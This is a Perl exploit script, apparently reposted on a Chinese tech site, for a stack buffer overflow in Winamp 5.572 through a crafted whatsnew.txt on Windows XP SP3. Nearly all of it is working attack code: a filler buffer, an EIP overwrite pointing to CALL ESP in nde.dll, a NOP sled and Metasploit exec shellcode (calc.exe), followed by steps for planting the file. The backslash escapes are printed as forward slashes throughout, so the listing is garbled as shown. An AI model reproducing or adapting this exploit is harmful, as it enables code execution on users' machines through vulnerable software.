Winamp v5.572 whatsnew.txt WinXP SP3 本地溢出漏洞

Winamp v5.572 whatsnew.txt WinXP SP3 本地溢出漏洞
# Tested on: WinXP SP3 De

#!/usr/bin/perl

# Still learning, having some fun...
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
# Special greetz do Debug, even i dont know you. Nice find man.
# Exploit has something around 70% chance of success.

print "/n#########################################/n";
print "# Winamp 5.572 stack buffer overflow    #/n";
print "# PoC by: Debug (eldadru/@gmail.com)     #/n";
print "# Exploit by: NeoCortex (ICQ 158005940) #/n";
print "#########################################/n";

print "                        __        __________________/n";
print "             ________  /  //      / / ____  / ____  / ________/n";
print "  ________  /_______/ / /// //    / / /___/ / /   / / /_______/ ________ /n";
print " /_______/ _______   / /  // //  / / /_____/ /   / / ________  /_______//n";
print "          /_______/ / /    // /// / /_____/ /___/ / /_______//n";
print "                   /_/      //__/_______/_______//n";
print "                   Where's the next phone box to the matrix please?/n/n/n";



my $version = "Winamp 5.572";

my $junk = "/x41" x 540;
my $eip = "/xad/x86/x0e/x07"; # overwrite EIP - 070E86AD    FFD4    CALL ESP nde.dll
my $nop = "/x90" x 100;

my $shellcode =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
"/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x49/x49/x49/x49/x49/x49".
"/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x51/x48/x5a/x6a/x47".
"/x58/x30/x42/x31/x50/x42/x41/x6b/x42/x41/x57/x42/x32/x42/x41/x32".
"/x41/x41/x30/x41/x41/x58/x50/x38/x42/x42/x75/x78/x69/x6b/x4c/x6a".
"/x48/x53/x74/x67/x70/x67/x70/x75/x50/x4e/x6b/x53/x75/x65/x6c/x6e".
"/x6b/x51/x6c/x46/x65/x70/x78/x43/x31/x68/x6f/x4e/x6b/x30/x4f/x54".
"/x58/x6e/x6b/x73/x6f/x57/x50/x67/x71/x58/x6b/x77/x39/x4c/x4b/x64".
"/x74/x6c/x4b/x57/x71/x5a/x4e/x76/x51/x49/x50/x6e/x79/x6e/x4c/x4f".
"/x74/x4b/x70/x70/x74/x37/x77/x69/x51/x48/x4a/x64/x4d/x43/x31/x4f".
"/x32/x7a/x4b/x48/x74/x55/x6b/x72/x74/x34/x64/x77/x74/x70/x75/x4d".
"/x35/x6c/x4b/x71/x4f/x75/x74/x36/x61/x48/x6b/x41/x76/x4c/x4b/x44".
"/x4c/x70/x4b/x4e/x6b/x63/x6f/x55/x4c/x33/x31/x68/x6b/x4e/x6b/x35".
"/x4c/x4e/x6b/x34/x41/x6a/x4b/x6c/x49/x33/x6c/x35/x74/x64/x44/x4a".
"/x63/x34/x71/x4b/x70/x63/x54/x6e/x6b/x71/x50/x76/x50/x4f/x75/x4b".
"/x70/x72/x58/x74/x4c/x4c/x4b/x77/x30/x76/x6c/x4c/x4b/x44/x30/x57".
"/x6c/x6c/x6d/x6e/x6b/x75/x38/x54/x48/x58/x6b/x73/x39/x6e/x6b/x4b".
"/x30/x4e/x50/x37/x70/x67/x70/x37/x70/x6c/x4b/x62/x48/x45/x6c/x63".
"/x6f/x35/x61/x39/x66/x35/x30/x50/x56/x4d/x59/x48/x78/x6e/x63/x59".
"/x50/x43/x4b/x66/x30/x43/x58/x68/x70/x6f/x7a/x43/x34/x33/x6f/x73".
"/x58/x4f/x68/x6b/x4e/x6d/x5a/x46/x6e/x72/x77/x6b/x4f/x78/x67/x63".
"/x53/x62/x41/x30/x6c/x55/x33/x64/x6e/x42/x45/x70/x78/x32/x45/x33".
"/x30/x47";

open (myfile,'>> whatsnew.txt');
print myfile $version.$junk.$eip.$nop.$shellcode;

print "[+] whatsnew.txt written./n";
print "[ ] Now copy it to your winamp folder.../n";
print "[ ] Run winamp and hit [About Winamp]->[Version History]/n";

你可能感兴趣的:(Winamp v5.572 whatsnew.txt WinXP SP3 本地溢出漏洞)